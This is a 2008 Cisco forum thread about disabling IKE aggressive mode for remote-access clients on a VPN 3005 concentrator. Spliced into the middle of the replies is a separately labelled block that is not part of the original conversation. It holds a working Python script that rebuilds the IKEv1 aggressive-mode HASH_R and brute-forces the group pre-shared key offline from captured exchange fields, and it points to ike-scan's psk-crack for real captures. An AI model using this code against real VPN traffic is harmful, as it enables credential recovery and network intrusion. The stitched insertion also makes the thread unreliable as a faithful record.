IKE Aggressive Mode on VPN3K

Answered Question
May 23rd, 2008

Hi,


I have a VPN 3005 with 4.7.2 OS (latest one to date). I am looking to disable Aggressive Mode processing (stick to Main Mode only) for Remote VPN clients. Please note, Remote VPN clients and NOT LAN-to-LAN connections.


So far I cannot see how this can be done.


The TAC engineer is not coming up with good answers either.


Anyone have an idea?


Thanks!

David

michael.leblanc Fri, 05/23/2008 - 16:47

I'm not familiar with the hardware you are using, but sometimes knowing the commands used on one platform can help you figure out what is required on another.


In an IOS environment, the following command would accomplish the desired result:


#crypto isakmp aggressive-mode disable


Unfortunately, that's the best I can do.


cisco24x7 Mon, 05/26/2008 - 17:41

Configuration | Policy Management | Traffic Management | Security Associations | Modify


This will allow you to select whether you want to have IKE in either Aggressive or Main mode. The default mode is "Main".



dknov Mon, 05/26/2008 - 19:27

Hi,


Thank you for your response, however this setting impacts only LAN-to-LAN tunnels and has no effect on Remote Access VPN, which is what I need (I had already verified this option).


Thanks,

David

Correct Answer
cisco24x7 Tue, 05/27/2008 - 03:44

I don't think you can make Remote Access VPN on the Concentrator work with Main mode, unless you decide to use Certificates instead of pre-shared key:


"The Cisco VPN client uses aggressive mode if preshared keys are used and uses main mode when public key infrastructure (PKI) is used during Phase 1 of the tunnel negotiations. After bringing up the Internet Security Association and Key Management Protocol Security Association (ISAKMP SA) for secure communication, the Cisco VPN 3000 concentrator prompts the user to specify the user credentials. In this phase, also known as X-Auth or extended authentication, the VPN 3000 concentrator validates the user against the configured authentication database. If the user authentication is successful, the Cisco concentrator sends a successful authentication message back to the client. After X-Auth, the Cisco VPN client requests configuration parameters such as the assigned IP address, the Domain Name System (DNS) server's IP address, and the Windows Internet Naming Service (WINS) server's IP address. During this phase, known as mode-config, the VPN 3000 concentrator sends the configured parameters back to the client. The final step for a successful VPN tunnel is the negotiation of Phase 2 parameters"
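Why the "aggressive mode with pre-shared keys" behaviour quoted above matters, as an added example that is not part of the original thread or of any Cisco code: in IKEv1 aggressive mode (RFC 2409 section 5.4) the responder's HASH_R is sent unencrypted in message 2, and every other input to it (both nonces, both DH public values, both cookies, the initiator's SA proposal body and the responder's ID) is also visible on the wire, so the pre-shared key is the only unknown and can be brute-forced offline. The script below reconstructs HASH_R from a constructed sample exchange and runs a dictionary attack against it. All field values, the group password "cisco123" and the word list are made up for the demonstration; the hash construction itself follows RFC 2409 with HMAC-SHA1 as the prf.

```python
"""Offline PSK recovery from an IKEv1 aggressive-mode exchange (RFC 2409 s.5.4).

Added example, not from the original thread. Sample values are constructed,
not captured from a VPN 3000 or any other device.
"""
import hashlib
import hmac
from dataclasses import dataclass, replace


def prf(key: bytes, data: bytes) -> bytes:
    # IKEv1 prf when SHA-1 is the negotiated hash: HMAC-SHA1 (RFC 2409 s.3.2)
    return hmac.new(key, data, hashlib.sha1).digest()


@dataclass(frozen=True)
class AggressiveModeObservation:
    """Fields a passive observer sees in aggressive-mode messages 1 and 2."""
    cky_i: bytes   # initiator cookie (ISAKMP header, message 1)
    cky_r: bytes   # responder cookie (ISAKMP header, message 2)
    sai_b: bytes   # body of the initiator's SA payload (message 1)
    gxi: bytes     # initiator DH public value, KE payload (message 1)
    gxr: bytes     # responder DH public value, KE payload (message 2)
    ni: bytes      # initiator nonce, Ni_b (message 1)
    nr: bytes      # responder nonce, Nr_b (message 2)
    idir_b: bytes  # body of the responder's ID payload (message 2)
    hash_r: bytes  # responder authentication hash, sent in the clear (message 2)


def skeyid_psk(psk: bytes, ni: bytes, nr: bytes) -> bytes:
    """SKEYID = prf(pre-shared-key, Ni_b | Nr_b) for PSK authentication."""
    return prf(psk, ni + nr)


def compute_hash_r(psk: bytes, o: AggressiveModeObservation) -> bytes:
    """HASH_R = prf(SKEYID, g^xr | g^xi | CKY-R | CKY-I | SAi_b | IDir_b)."""
    return prf(skeyid_psk(psk, o.ni, o.nr),
               o.gxr + o.gxi + o.cky_r + o.cky_i + o.sai_b + o.idir_b)


def crack_psk(o: AggressiveModeObservation, candidates):
    """Recompute HASH_R for each candidate PSK; return the first that matches."""
    for psk in candidates:
        if hmac.compare_digest(compute_hash_r(psk, o), o.hash_r):
            return psk
    return None


# --- constructed sample exchange (hypothetical values, not a real capture) ---
# Short DH values keep the sample readable; the construction is identical
# for real 1024-bit group 2 public values.
_SECRET_GROUP_PSK = b"cisco123"   # the group password the attacker wants
_fields = dict(
    cky_i=bytes.fromhex("1122334455667788"),
    cky_r=bytes.fromhex("99aabbccddeeff00"),
    # SA body: DOI 1, situation 1, one proposal with one 3DES/SHA/PSK/group-2
    # transform and a 28800 s lifetime (constructed for the example)
    sai_b=bytes.fromhex(
        "00000001" "00000001" "0000002c" "01010001" "00000024" "01010000"
        "80010005" "80020002" "80030001" "80040002" "800b0001" "000c0004"
        "00007080"),
    gxi=bytes(range(1, 33)),
    gxr=bytes(range(33, 65)),
    ni=bytes.fromhex("0102030405060708090a0b0c0d0e0f10"),
    nr=bytes.fromhex("101f1e1d1c1b1a191817161514131211"),
    # ID_IPV4_ADDR (1), protocol UDP (17), port 500, address 203.0.113.1
    idir_b=bytes.fromhex("011101f4") + bytes([203, 0, 113, 1]),
)
_partial = AggressiveModeObservation(hash_r=b"", **_fields)
# What the responder puts on the wire: HASH_R keyed by the real group PSK.
OBSERVED = replace(_partial, hash_r=compute_hash_r(_SECRET_GROUP_PSK, _partial))

# A tiny constructed word list standing in for a real dictionary.
WORDLIST = [b"password", b"vpn", b"cisco", b"cisco123", b"letmein"]


if __name__ == "__main__":
    found = crack_psk(OBSERVED, WORDLIST)
    print("recovered PSK:", found)
```

With real traffic the nine fields come out of a packet capture, which is exactly what ike-scan's --pskcrack output and psk-crack automate. Two points the thread's concern rests on: the attacker does not even need to be on-path, since in aggressive mode the responder authenticates first and returns HASH_R to any initiator that presents a known group name as IDii; and in main mode the same hashes are sent only inside the encrypted third exchange, so a capture alone gives nothing to attack offline.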



dknov Tue, 05/27/2008 - 11:20

Thanks a lot. I was looking for this statement from Cisco on VPN3K not being able to handle Main Mode with XAUTH....


Can you send me the link you took this from?
